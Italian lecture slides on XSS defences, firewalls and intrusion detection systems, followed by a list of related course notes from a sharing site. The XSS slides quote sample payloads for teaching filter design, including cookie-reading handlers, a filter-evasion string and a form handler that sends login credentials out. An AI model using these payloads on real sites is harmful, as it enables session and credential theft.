Elementi di Sicurezza e Privatezza Lezione 15 Firewall and IDS. Chiara Braghin
|
|
- Franco Umberto Spada
- 6 anni fa
- Visualizzazioni
Transcript
1 Elementi di Sicurezza e Privatezza Lezione 15 Firewall and IDS Chiara Braghin
2 XSS: difese a lato server
3 Come proteggersi? Assicurarsi che l applicazione verifichi tutti gli header, cookie, query, campi dei form (anche quelli hidden!) tenendo a mente cosa è permesso e cosa non lo è Conviene avere una politica che specifica COSA È PERMESSO, e non cosa sia negato. 2
4 Validazione dell input Mai fidarsi dei dati provenienti dal client Rimuovere/codificare i caratteri speciali Verificare la presenza di alcuni tag 3
5 Filtrare l output Rimuovere/cifrare i caratteri speciali (X)HTML < per <, > per >, " per Permettere solo comandi safe (e.g., no <script> ) Attenzione 1: Controllare trucchi anti-filtro Quoting malformato: <IMG ><SCRIPT>alert( XSS ) Attenzione 2: Gli script non si trovano solo dentro <script>! 4
6 Scripts non solo in <script>! JavaScript as scheme in URI <img src= javascript:alert(document.cookie); > JavaScript On{event} attributes (handlers) OnSubmit, OnError, OnLoad, Typical use: <img src= none OnError= alert(document.cookie) > <iframe src=` onload=`steal()`> <form> action="logon.jsp" method="post" onsubmit="hackimg=new Image; hackimg.src=' +document.for ms(1).login.value'+':'+ document.forms(1).password.value;" </form> 5
7 Problemi con i filtri Si supponga che un filtro rimuova <script Caso OK: <script src=... src=... Però <scr<scriptipt src=... <script src=... 6
8 XSS: difese a lato client
9 Come difendersi? Proxy-based Analizzare il traffico HTTP scambiato tra il browser e il Web server cercando (e rimuovendo o codificando) caratteri speciali Application-level firewall Analizzare le pagine HTML cercando dei link che possono rilasciare informazioni sensibili Blocccare richieste cattive Auditing system Monitorare l esecuzione di codice JavaScript e confrontarle con una politica ad alto livello 8
10 Outline di oggi Vi ricordate le 3 parole chiave per garantire un sistema sicuro? Prevenzione Rilevamento Reazione Oggi: Firewall: prevenzione tramite protezione perimetrale Intrusion detection system (IDS): rilevamento 9
11 Firewall
12 Firewall Sistema di controllo degli accessi che verifica tutto il traffico in transito Consente o nega il passaggio del traffico basandosi su una politica di sicurezza Funzioni: verifica pacchetti in transito blocca pacchetti non autorizzati e/o pericolosi maschera indirizzi interni (classi di indirizzi IP riservate e non instradabili ) (NAT, Network Address Translation) 11
13 Firewall: scenario di base Separa la LAN dal resto della rete Tutti i pacchetti tra la LAN e il resto della rete vengono instradati attraverso il firewall Firewall Local network Internet Router 12
14 Firewall: DMZ (1) DMZ: De-Militarized Zone Una o più sottoreti accessibili con connessioni dall'esterno (e dallʼinterno) della rete ma filtrati dal firewall Gli host della DMZ non possono connettersi alla rete interna Contiene i server che devono essere accessibili dallʼesterno e/o dalla rete interna server server DNS server Web 13
15 Firewall: DMZ (2) 14
16 Firewall: politiche di sicurezza (1) Il firewall applica delle regole per stabilire se far passare o meno i pacchetti è utile solo quando le regole vengono configurate in modo appropriato Per tutte le sottoreti protette da un firewall si possono definire diverse politiche di accesso realizza una separazione in zone aventi diverso grado di sicurezza nellʼarchitettura di rete 15
17 Firewall: politiche di sicurezza (2) Serve una specifica ad alto livello della politica di sicurezza default deny: tutto viene bloccato tranne quello che è autorizzato (politica chiusa) default allow: tutto viene permesso tranne quello che non è autorizzato (politica aperta) 16
18 Tipi di Firewall Network layer Packet filtering Stateful packet filtering Application layer Circuit level Application proxy 17
19 Packet filter (1) Filtra i pacchetti solo sulla base delle informazioni nellʼheader del pacchetto TCP i valori dei campi degli header dei pacchetti vengono confrontati con le regole della politica e ammessi o scartati a seconda del risultato del confronto Header indirizzo sorgente indirizzo destinazione porta sorgente porta destinazione tipo di protocollo opzioni di protocollo 18
20 Packet filter (2) Non si può tracciare la correlazione tra pacchetti in una trasmissione Ogni pacchetto viene esaminato singolarmente, indipendentemente dai pacchetti precedenti e da quelli successivi Non si possono esaminare problemi a livello (OSI) più alto 19
21 Regole di filtraggio (1) Indirizzi IP usati per chiudere/aprire il traffico da determinate sorgenti a determinate destinazioni Numeri di porta usati per bloccare/permettere servizi noti (porta 80?) Bloccare un protocollo Combinazioni dei precedenti 20
22 Regole di filtraggio (2) Esempi di regole: Se un pacchetto arriva sullʼinterfaccia esterna del firewall ed ha un mittente della rete interna lo si blocca Verifica di spoofing (falsificazione dellʼidentità) Se un pacchetto arriva dallʼesterno e fa parte di una connessione ftp non accettarlo Accettare solo connessioni sicure (SFTP - SSH File Transfer Protocol, o FTPS - FTP over SSL) 21
23 Regole di filtraggio (3) Come vengono valutate le regole? Le regole di filtraggio memorizzate in uno specifico ordine Viene utilizzata la prima regola incontrata con la quale cʼè corrispondenza Se una regola blocca la trasmissione o ricezione del pacchetto, il pacchetto è rifiutato Se una regola permette la trasmissione o ricezione di un pacchetto, il pacchetto è permesso Se il pacchetto non soddisfa nessuna regola si applica la regola di default (deny all o allow all) 22
24 Regole di filtraggio (4) Di solito vengono definite tramite la seguente tabella (variante standard CISCO): Direzione IP sorgente IP destinazione Protocollo Porta sorgente Porta destinazione Flag ACK Azione Flag ACK: se il protocollo è TCP, il suo valore può essere 0, 1 o 0/1; ** per altri protocolli In una connessione TCP: Server port: < 1024 Client port: tra 1024 e
25 Politica di sicurezza: esempio (1) Permettere la connessione tra i client in rete = ed il servizio SMTP (tcp/25) di qualsiasi host esterno Possibile tabella: Direzione IP sorgente IP destinazione Protocollo Porta sorgente Porta destinazione Flag ACK Azione OUT rete ANY TCP >= ANY permit IN ANY rete TCP 25 >= permit 24
26 Politica di sicurezza: esempio (2) Problemi: Non cʼè modo di garantire che il ritorno del pacchetto di conferma (TCP ACK) venga dalla stessa connessione Porte nel range [1024, 16383] disponibili per i client per ricevere le risposte, ma: potrebbe essere la risposta legittima di un server ad una connessione stabilita precedentemente potrebbe essere traffico illecito Politica troppo lasca! 25
27 Stateful (dynamic) packet filtering (1) Simile al packet filter ma state-aware Distingue le nuove connessioni da quelle già aperte tabelle di stato per le connessioni aperte ogni pacchetto viene esaminato sia singolarmente che in relazione ai pacchetti precedentemente ricevuti e appartenenti alla stessa sessione Prestazioni migliori rispetto a packet filter 26
28 Stateful (dynamic) packet filtering (2) 27
29 Firewall: architettura Software su processori general purpose sistema più economico e flessibile Software su processori GP (Gigahertz processor) Hardware dedicato (router) soluzione più costosa e spesso basata su software proprietario 28
30 Firewall: limiti Controlla tutto e solo il traffico che lo attraversa intrusioni interne non sono individuate Se le connessioni arrivano attraverso un percorso non controllato, il firewall non serve utente connesso via modem Non controllano file infetti da virus 29
31 Intrusion Detection Systems
32 Audit di sicurezza Audit = attività atte a misurare la conformità di determinati processi, strutture o procedure a determinate caratteristiche richieste Usato in due diverse accezioni: Analisi delle procedure e delle pratiche adottate per valutare le eventuali vulnerabilità Analisi degli eventi per determinare violazioni alla sicurezza o tentativi di violazioni 31
33 Aree di intervento Sicurezza organizzativa verifica delle responsabilità politiche aziendali Sicurezza logica e fisica valutazione protezione da accessi non autorizzati valutazione protezione da eventi di natura umana o ambientale (es., dispositivi antincendio, backup) valutazione protezione dellʼinfrastruttura di rete valutazione protezione di server e client Sicurezza delle applicazioni verifica protezione dei sistemi applicativi rispetto alle tipologie di rischio intrinseco e implementativo 32
34 Analisi dei rischi Identificazione e valutazione dei rischi che si verifichi un certo evento Meccanismi per tenere i rischi sotto controllo Valutazione della probabilità che accada un rishio Valutazione dellʼimpatto di ciascun rischio Determinazione di contromisure Sviluppo e utilizzo di misure per mitigare gli effetti di un rischio Determinazione della gravità di un rischio e scelta delle contromisure appropriate 33
35 Tool per lʼanalisi automatica Riducono la quantità di dati che devono essere analizzati manualmente Sistemi per la determinazione di intrusioni (intrusion detection system) Acquisizione e analisi svolti in contemporanea 34
36 Intrusion detection system (IDS) - 1 Gli IDS sono sistemi di monitoraggio rilevano attacchi generano allarmi, non prevengono intrusioni Fasi di un IDS: 1. Raccolta dati 2. Analisi 3. Risposta 35
37 Intrusion detection system (IDS) - 2 Idee di base: 1. Chi entra in un sistema abusivamente compie operazioni che un utente normale non fa 2. Gli attacchi spesso sono associati ad una violazione del controllo dellʼaccesso buffer overflow utente esterno ottiene accesso a risorse protette programma e/o file modificati 36
38 IDS: requisiti Deve poter essere eseguito senza la supervisione degli utenti Non deve essere una scatola nera il suo comportamento interno dovrebbe essere analizzabile dallʼesterno Deve essere resistente ai guasti Deve essere resistente ad attacchi Deve richiedere un basso overhead Deve essere facilmente adattabile al sistema in osservazione Deve far fronte a cambiamenti nel comportamento del sistema 37
39 IDS: classificazione (1) Due tecniche di analisi dei dati: Anomaly detection: segnala eventuali (e significative) deviazioni dal modello normale di comportamento Misuse detection: segnala lʼeventuale comparsa di eventi che rispecchiano schemi predefiniti di attacchi Richiede una conoscenza a priori dei possibili attacchi 38
40 IDS: classificazione (2) Utilizza dati differenti: HIDS (Host-based Intrusion Detection System): dati relative allʼattivita locale di un singolo computer (log di sistema, accesso a file critici, ecc, ) visibilità migliore dei comportamenti di una applicazione in esecuzione sulla macchina NIDS (Network-based Intrusion Detection System): controlla il traffico di rete Un singolo NIDS può proteggere diverse macchine 39
41 Anomaly detection Basati sulla definizione di profili dʼuso che descrivono il normale funzionamento costruiti manualmente (difficile!) attraverso tecniche di machine learning e data mining Anomalie: deviazioni dai profili deviazione rispetto dati statistici Capace di riconoscere nuovi attacchi 40
42 Anomaly detection: profili Definiti in base a determinate caratteristiche (metriche) che vengono monitorate dal sistema Attività di login e sessione frequenza login ultimo login tentativi di specifica password falliti Esecuzione di programmi e comandi frequenza di esecuzione risorse di CPU e I/O usate Attività di accesso a file frequenza di read/write/create/delete numero record letti/scritti numero letture/scritture/cancellazioni/creazioni falliti 41
43 Esempio: sequenze di sys call Costruisce delle tracce durante la normale esecuzione del programma Comportamento di esempio (sys calls) open read write open mmap write fchmod close Alcune tracce vengono memorizzate (lung = 4) open read write open read write open mmap write open mmap write open mmap write fchmod mmap write fchmod close Riporta un anomalia se la sequenza seguente viene osservata: open read read open mmap write fchmod close 42
44 Anomaly detection: problemi Scelta delle metriche (cosa misurare) Scelta dei modelli di base: cosa succede se lʼattacco compare solo in variabili che non sono state modellate? Segnalazione di tipo statistico che va interpretata da un esperto umano Scelta dei threshold (soglia di allarme) 43
45 Misuse detection Si basa sulla descrizione dei tipi di attacco (caratteristiche invarianti di attacchi noti) Riconosce solo attacchi per cui esiste una descrizione (signature) Usa un modello di regole per descrivere gli attacchi Pro: Genera segnalazioni precise Contro: Riconosce solo attacchi noti 44
46 Misuse detection: problemi Necessità di gestire un repository degli attacchi Problemi di aggiornamento (solo gli attacchi conosciuti vengono segnalati) Problema di generazione delle signature degli attacchi 45
47 Host-based IDS HIDS è in grado di monitorare attività a livello di singolo utente Vantaggi: Scopre la presenza di rootkit Svantaggi: necessario un IDS per ogni macchina se un attaccante ottiene il controllo della macchina può modificare IDS e lʼaudit log solo visione locale di un attacco Esempi di HIDS: Tripwire (controlla integrità file) 46
48 Network-based IDS Ispezionano traffico di rete Cerca violazioni a protocolli pattern di connessioni inusuali stringhe di attacco nei payload dei pacchetti Svantaggi: non sono in grado di ispezionare traffico crittato non tutti gli attacchi arrivano dalla rete memorizzza ed elabora una grande quantità di traffico Esempi di NIDS Snort, Bro 47
49 Falsi positivi e falsi negativi Falsi positivi: Allarmi provocati da eventi legittimi le politiche di sicurezza in realtà non vengono violate causa interruzioni non necessarie causa insoddisfazioni negli utenti Falsi negativi: Allarmi mancati in presenza di eventi illegittimi le politiche di sicurezza sono violate intrusione non rilevata evento illegittimo interpretato come legittimo 48
50 IDS: problemi Mancanza di dati interessanti Molti network normali, system call data Pochi dati su attacchi realistici, anomalie Difficile scegliere il valore soglia Alcuni attacchi possono rientrare nei limiti di attività normali Falsi positivi/negativi sono molto costosi 49
Elementi di Sicurezza e Privatezza Lezione 10 Firewall and IDS
Elementi di Sicurezza e Privatezza Lezione 10 Firewall and IDS Chiara Braghin chiara.braghin@unimi.it Firewall Firewall Sistema di controllo degli accessi che verifica tutto il traffico in transito Consente
DettagliSicurezza dei calcolatori e delle reti
Sicurezza dei calcolatori e delle reti Proteggere la rete: tecnologie Lez. 11 A.A. 2010/20011 1 Firewall I firewall sono probabilmente la tecnologia per la protezione dagli attacchi di rete più diffusa
DettagliSicurezza architetturale, firewall 11/04/2006
Sicurezza architetturale, firewall 11/04/2006 Cos è un firewall? Un firewall è un sistema di controllo degli accessi che verifica tutto il traffico che transita attraverso di lui Consente o nega il passaggio
DettagliDifesa perimetrale di una rete
Muro tagliafuoco per: Evitare accessi indesiderati Controllare traffico di dati in uscita Tagliare i flussi di I/O generati da malware Filtrare i segmenti di una VLAN azione Tipi di firewall: Ingress firewall
DettagliSicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall
I firewall Perché i firewall sono necessari Le reti odierne hanno topologie complesse LAN (local area networks) WAN (wide area networks) Accesso a Internet Le politiche di accesso cambiano a seconda della
DettagliUniversità degli Studi di Pisa Dipartimento di Informatica. NAT & Firewalls
Università degli Studi di Pisa Dipartimento di Informatica NAT & Firewalls 1 NAT(NETWORK ADDRESS TRANSLATION) MOTIVAZIONI NAT(Network Address Translation) = Tecnica di filtraggio di pacchetti IP con sostituzione
DettagliProf. Filippo Lanubile
Firewall e IDS Firewall Sistema che costituisce l unico punto di connessione tra una rete privata e il resto di Internet Solitamente implementato in un router Implementato anche su host (firewall personale)
DettagliElementi di Sicurezza e Privatezza. Proteggere la rete: tecnologie Lez. 13
Elementi di Sicurezza e Privatezza Proteggere la rete: tecnologie Lez. 13 Firewall I firewall sono probabilmente la tecnologia per la protezione dagli attacchi di rete più diffusa Un Internet firewall,
DettagliDispositivi di rete 10 Docente: Marco Sechi Modulo 1 ROUTER È un dispositivo di rete che si posiziona sul livello 3 del modello OSI. Pertanto un Router (dall'inglese instradatore) è un dispositivo che
DettagliFIREWALL. Firewall - modello OSI e TCP/IP. Gianluigi Me. me@disp.uniroma2.it Anno Accademico 2005/06. Modello OSI. Modello TCP/IP. Application Gateway
FIREWALL me@disp.uniroma2.it Anno Accademico 2005/06 Firewall - modello OSI e TCP/IP Modello TCP/IP Applicazione TELNET FTP DNS PING NFS RealAudio RealVideo RTCP Modello OSI Applicazione Presentazione
DettagliFirewall. Protezione perimetrale e sistemi anti intrusione
Firewall Protezione perimetrale e sistemi anti intrusione Dispositivi di sicurezza Internet è un ambiente poco sicuro. Si rischia di subire ogni tipo di frode. Per l amministratore della rete di una organizzazione
DettagliFIREWALL OUTLINE. Introduzione alla sicurezza delle reti. firewall. zona Demilitarizzata
FIREWALL OUTLINE Introduzione alla sicurezza delle reti firewall zona Demilitarizzata SICUREZZA DELLE RETI Ambra Molesini ORGANIZZAZIONE DELLA RETE La principale difesa contro gli attacchi ad una rete
DettagliLaboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella
Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017 Ing. Niccolò Iardella niccolo.iardella@unifi.it 1 Esercitazione 7 Configurazione del firewall 2 Programma
DettagliSicurezza applicata in rete
Sicurezza applicata in rete Contenuti del corso La progettazione delle reti Il routing nelle reti IP Il collegamento agli Internet Service Provider e problematiche di sicurezza Analisi di traffico e dei
DettagliArchitetture e strumenti per la sicurezza informatica
Università Politecnica delle Marche Architetture e strumenti per la sicurezza informatica Ing. Gianluca Capuzzi Agenda Premessa Firewall IDS/IPS Auditing Strumenti per l analisi e la correlazione Strumenti
DettagliFirewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.
Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere
DettagliIDS: Intrusion detection systems
IDS/IPS/Honeypot IDS: Intrusion detection systems Tentano di rilevare: attività di analisi della rete tentativi di intrusione intrusioni avvenute comportamenti pericolosi degli utenti traffico anomalo
DettagliFirewall Intrusion Detection System
Firewall Intrusion Detection System Damiano Carra Università degli Studi di Verona Dipartimento di Informatica Parte I: Firewall 2 Firewall! I Firewall di rete sono apparecchiature o sistemi che controllano
DettagliSicurezza delle reti 1
1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo 2.5 Italia
DettagliCrittografia e sicurezza delle reti. Firewall
Crittografia e sicurezza delle reti Firewall Cosa è un Firewall Un punto di controllo e monitoraggio Collega reti con diversi criteri di affidabilità e delimita la rete da difendere Impone limitazioni
DettagliProteggere la rete I FIREWALL (seconda parte)
Proteggere la rete I FIREWALL (seconda parte) Index Architetture di rete con Firewall A cosa serve il NAT Cosa sono gli Intrusion Detection System Esistono molte architetture possibili per inserire un
DettagliOrganizzazione della rete
Network Security Elements of Network Security Protocols Organizzazione della rete Il firewall La zona demilitarizzata (DMZ) System security Organizzazione della rete La principale difesa contro gli attacchi
DettagliFirewall. Corso di Sicurezza su Reti Lezione del 15 Dicembre Pacchetti. Filtraggio di pacchetti
Firewall Barbara Masucci Dipartimento di Informatica ed Applicazioni Università di Salerno masucci@dia.unisa.it http://www.dia.unisa.it/professori/masucci Pacchetti I messaggi sono divisi in pacchetti
DettagliSicurezza delle reti 1
delle delle 1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo
DettagliFirewall e NAT A.A. 2005/2006. Walter Cerroni. Protezione di host: personal firewall
Firewall e NAT A.A. 2005/2006 Walter Cerroni Protezione di host: personal firewall Un firewall è un filtro software che serve a proteggersi da accessi indesiderati provenienti dall esterno della rete Può
DettagliFirewall. Pacchetti. Filtraggio di pacchetti: Regole. Filtraggio di pacchetti
Firewall Pacchetti I messaggi sono divisi in pacchetti I pacchetti sono trasmessi in modo indipendente Barbara Masucci Dipartimento di Informatica ed Applicazioni Università di Salerno masucci@dia.unisa.it
DettagliSicurezza delle reti. Monga TLS/SSL. A livello di trasporto. Sicurezza perimetrale
delle delle dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2015/16 Lezione VI: 1 cba 2011 15 M.. Creative Commons Attribuzione Condividi
DettagliLa sicurezza delle reti
La sicurezza delle reti Inserimento dati falsi Cancellazione di dati Letture non autorizzate A quale livello di rete è meglio realizzare la sicurezza? Applicazione TCP IP Data Link Physical firewall? IPSEC?
DettagliACCESS CONTROL LIST. ACCESS CONTROL LIST standard
ACCESS CONTROL LIST Le ACL (Access Control List) sono una lista di istruzioni da applicare alle interfacce di un router allo scopo di gestire il traffico, filtrando i pacchetti in entrata e in uscita.
DettagliI protocolli di rete. Mauro Gaspari
I protocolli di rete Mauro Gaspari 1 La comunicazione in rete è basata sul concetto di Standard Definizione: uno standard di rete è costituito da un insieme di regole e convenzioni che specificano come
DettagliINFORMATICA GENERALE - MODULO 2 CdS in Scienze della Comunicazione. CRISTINA GENA cgena@di.unito.it http://www.di.unito.it/~cgena/
INFORMATICA GENERALE - MODULO 2 CdS in Scienze della Comunicazione CRISTINA GENA cgena@di.unito.it http://www.di.unito.it/~cgena/ INTRANET & EXTRANET Intranet Con questo termine s intende l uso delle tecnologie
DettagliPACKET FILTERING IPTABLES
PACKET FILTERING IPTABLES smox@shadow:~# date Sat Nov 29 11:30 smox@shadow:~# whoami Omar LD2k3 Premessa: Le condizioni per l'utilizzo di questo documento sono quelle della licenza standard GNU-GPL, allo
DettagliStudio di reti di sensori con comportamento ciclico con il simulatore Castalia. Corso di Laurea in Informatica
Studio di reti di sensori con comportamento ciclico con il simulatore Castalia Corso di Laurea in Informatica Candidato Andrea Di Saverio Relatori Maria Cristina Pinotti Alfredo Navarra Anno accademico
DettagliFirewall. Che cosa proteggere? Pacchetti. Filtraggio di pacchetti: Regole. Filtraggio di pacchetti. Filtraggio di pacchetti: perché?
Firewall Pacchetti I messaggi sono divisi in pacchetti I pacchetti sono trasmessi in modo indipendente Alfredo De Santis Dipartimentodi Informatica ed Applicazioni Università di Salerno 1 Filtraggio di
DettagliElementi sull uso dei firewall
Laboratorio di Reti di Calcolatori Elementi sull uso dei firewall Carlo Mastroianni Firewall Un firewall è una combinazione di hardware e software che protegge una sottorete dal resto di Internet Il firewall
DettagliIl firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall
Il firewall ipfw Introduzione ai firewall classificazione Firewall a filtraggio dei pacchetti informazioni associate alle regole interpretazione delle regole ipfw configurazione impostazione delle regole
DettagliAntonio Cianfrani. Standard Access Control List (ACL)
Antonio Cianfrani Standard Access Control List (ACL) Indice Cosa sono le ACL? Interfacce Inbound & Outbound Wildcard mask Configurare una ACL standard ACL extended (prossima lezione) Named ACL (prossima
DettagliFirewalls. Outline. Ing. Davide Ariu
Pattern Recognition and Applications Lab Firewalls Ing. Davide Ariu Dipartimento di Ingegneria Elettrica ed Elettronica Università di Cagliari, Italia Outline Cosa è un Firewall Funzionalità di un Firewall
DettagliINDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO. Introduzione e scopo del documento SICUREZZA... 8
Introduzione e scopo del documento INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO SICUREZZA... 8 1.1 INTRODUZIONE... 9 1.1.1 MOTIVAZIONI: PERCHÉ SERVE LA SICUREZZA... 9 1.1.2 CONFIDENZIALITÀ,
DettagliPetra Internet Firewall Corso di Formazione
Petra Internet Framework Simplifying Internet Management Link s.r.l. Petra Internet Firewall Corso di Formazione Argomenti Breve introduzione ai Firewall: Definizioni Nat (masquerade) Routing, Packet filter,
DettagliMODELLI ISO/OSI e TCP/IP
PARTE I - Reti di Calcolatori ed Internet MODELLI ISO/OSI e TCP/IP 2.1 Reti di Calcolatori Livelli e Servizi Il modello OSI Il modello TCP/IP Un confronto tra OSI e TCP/IP ARPANET Ethernet Reti ATM reti
DettagliSommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione
Sesta Esercitazione Sommario Introduzione ai firewall Definizione e scopo Classificazione Firewall a filtraggio dei pacchetti Informazioni associate alle regole Interpretazione delle regole Il firewall
DettagliChe cos è un firewall? Firewall e IDS/IPS
Che cos è un firewall? Firewall e IDS/IPS firewall = muro tagliafuoco collegamento controllato tra reti a diverso livello di sicurezza = sicurezza del perimetro (filtro di ) Antonio Lioy < lioy @ polito.it
DettagliProteggere la rete: I FIREWALL
Proteggere la rete: I FIREWALL Index Start up Firewall A cosa servono i Firewall Cosa è un Firewall Come si configurano Le principali applicazioni dei Firewall StartUp Firewall La tecnologia dei Firewall
DettagliCorso MIUR C2 Modulo 8. Firewall. Ing. Giampaolo Mancini Ing. Fabio De Vito
Corso MIUR C2 Modulo 8 Firewall Ing. Giampaolo Mancini Ing. Fabio De Vito 11/02/04 15.15.03 Sommario Concetto di firewalling Funzionalità di un firewall Filtro sui pacchetti in ingresso Filtro sui pacchetti
DettagliLa sicurezza nel Web
La sicurezza nel Web Protezione vs. Sicurezza Protezione: garantire un utente o un sistema della non interazione delle attività che svolgono in unix ad esempio i processi sono protetti nella loro esecuzione
DettagliModulo 8. Architetture per reti sicure Terminologia
Pagina 1 di 7 Architetture per reti sicure Terminologia Non esiste una terminologia completa e consistente per le architetture e componenti di firewall. Per quanto riguarda i firewall sicuramente si può
DettagliMODELLI ISO/OSI e TCP/IP
PARTE I - Reti di Calcolatori ed Internet MODELLI ISO/OSI e TCP/IP Reti di Calcolatori Livelli e Servizi Il modello OSI Il modello TCP/IP Un confronto tra OSI e TCP/IP ARPANET Ethernet Reti ATM reti wireless
DettagliEsercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio
Sommario Esercitazione 05 Angelo Di Iorio Packet Filtering ICMP Descrizione esercitazione Applicazioni utili: Firewall: wipfw - netfilter Packet sniffer: wireshark ALMA MATER STUDIORUM UNIVERSITA DI BOLOGNA
Dettaglimaurizio pizzonia sicurezza dei sistemi informatici e delle reti. esercizi su sicurezza delle reti
20062010 maurizio pizzonia sicurezza dei sistemi informatici e delle reti esercizi su sicurezza delle reti 1 20062010 maurizio pizzonia sicurezza dei sistemi informatici e delle reti screened subnet gastone.2
DettagliInternet (- working). Le basi.
Internet (- working). Le basi. 1 GABRIELLA PAOLINI (GARR) 18 OTTOBRE 2011 Capire come funziona Internet 2 FACCIAMO UN PASSO INDIETRO Internet È un insieme di reti interconnesse fra di loro su tutto il
DettagliIntroduzione al NATTING
Introduzione al NATTING I Router CISCO sono in grado di svolgere funzioni proprie di un firewall, in particolare possono effettuare la trasformazione degli indirizzi IP PRIVATI usati dai pc della rete
DettagliFiltraggio del traffico IP in linux
Filtraggio del traffico IP in linux Laboratorio di Amministrazione di Sistemi L-A Dagli appunti originali di Fabio Bucciarelli - DEIS Cos è un firewall? E un dispositivo hardware o software, che permette
DettagliProva di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00
Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:
DettagliEsercitazione 05. Prima di iniziare. Packet Filtering [ ICMP ] Sommario. Angelo Di Iorio (Paolo Marinelli)
Prima di iniziare L ultima lezione (lunedì 7/12) sarà dedicata alla correzione dei quiz e discussione di eventuali dubbi e chiarimenti Esercitazione 05 Termine di consegna dei report: 8 Gennaio 2010, ore
DettagliInternet e protocollo TCP/IP
Internet e protocollo TCP/IP Internet Nata dalla fusione di reti di agenzie governative americane (ARPANET) e reti di università E una rete di reti, di scala planetaria, pubblica, a commutazione di pacchetto
DettagliI firewall. I firewall
I firewall Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Che cos è un firewall? firewall = muro tagliafuoco collegamento controllato tra reti a diverso livello di
DettagliIP forwarding Firewall e NAT
IP forwarding Firewall e NAT A.A. 2004/2005 Walter Cerroni IP forwarding Linux può funzionare da gateway tra due o più reti IP host1 host2 linux-gw 192.168.11.0/24 192.168.10.0/24 Il kernel deve essere
DettagliVLSM - Variable Length Subnet Masks E-4: VLSM, Supernetting, NAT/PAT, Firewall
VLSM - Variable Length Subnet Masks E-4: VLSM, Supernetting, NAT/PAT, Firewall A. Memo 1987, esce l RFC 1009, che specifica come una sottorete può utilizzare più Subnet Mask ammette lunghezze diverse dell
DettagliIndice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP
Indice Capitolo 1 I rischi: introduzione alle reti connesse a Internet 1 1.1 Il virus Worm 3 1.2 Lo stato della rete nel 2002 9 1.3 Cos è Internet 10 1.4 La commutazione di pacchetti: la base della maggior
DettagliISO- OSI e architetture Client-Server
LEZIONE 9 ISO- OSI e architetture Client-Server Proff. Giorgio Valle Raffaella Folgieri giorgio.valle@unimi.it folgieri@dico.unimi.it Lez 10 modello ISO-OSI e architettura client-server 1 Nelle scorse
DettagliUniversita di Milano - Polo di Crema Novembre Session Hijacking. Marco Cremonini 1. Marco Cremonini - Corso Integrativo Network Security 1
Session Hijacking Marco Cremonini 1 Marco Cremonini - Corso Integrativo Network Security 1 SESSION HIJACKING (lett. dirottare una sessione): una sessione attiva tra un client e un server viene dirottata
DettagliProgrammazione in Rete
Programmazione in Rete a.a. 2005/2006 http://www.di.uniba.it/~lisi/courses/prog-rete/prog-rete0506.htm dott.ssa Francesca A. Lisi lisi@di.uniba.it Orario di ricevimento: mercoledì ore 10-12 Sommario della
DettagliConnessione di reti private ad Internet. Fulvio Risso
Connessione di reti private ad Internet Fulvio Risso 1 Connessione di reti private ad Internet Diffusione di reti IP private Utilizzo di indirizzi privati Gli indirizzi privati risolvono il problema dell
Dettagli- Dispensa VI - RETI DI CALCOLATORI
Elementi di Informatica e Programmazione - Dispensa VI - RETI DI CALCOLATORI Alessandro Saetti (email: alessandro.saetti@unibs.it) Università degli Studi di Brescia 1 Classificazione delle Reti Modalità
DettagliREPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA
REPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA SETTORE ECONOMICO PROFESSIONALE 1 Servizi di Processo Sviluppo e gestione di prodotti e servizi informatici Sequenza di processo Definizione
DettagliInstallazione e Configurazione del servizio DHCP. Orazio Battaglia
Installazione e Configurazione del servizio Orazio Battaglia Protocollo e Servizio Il protocollo (Dynamic Host Configuration Protocol) è un protocollo di rete di livello applicativo che permette ai dispositivi
Dettagli4b. Esercizi sul livello di Rete Inoltro in IP
4b. sul livello di Rete Inoltro in IP 4b-1 o Un router riceve sull interfaccia eth1 una serie di pacchetti. L interfaccia ha come indirizzo MAC bbbb:6c3c:5656:3b34 e l indirizzo IP: 131.175.21.254. Il
DettagliLo strato di applicazione in Internet
Lo strato di applicazione in Internet Prof. Ing. Carla Raffaelli a.a. 2004/2005 Protocolli applicativi Sono i protocolli utilizzati dalle applicazioni per scambiarsi informazioni Esempi: HTTP per il web,
DettagliBesnate, 24 Ottobre 2009. Oltre il Firewall. pipex08@gmail.com
Besnate, 24 Ottobre 2009 Oltre il Firewall Autore: Gianluca pipex08@gmail.com Cos'è un firewall i FIREWALL sono i semafori del traffico di rete del nostro PC Stabiliscono le regole per i pacchetti che
DettagliSviluppo siti e servizi web Programmi gestionali Formazione e Consulenza Sicurezza informatica Progettazione e realizzazione di reti aziendali
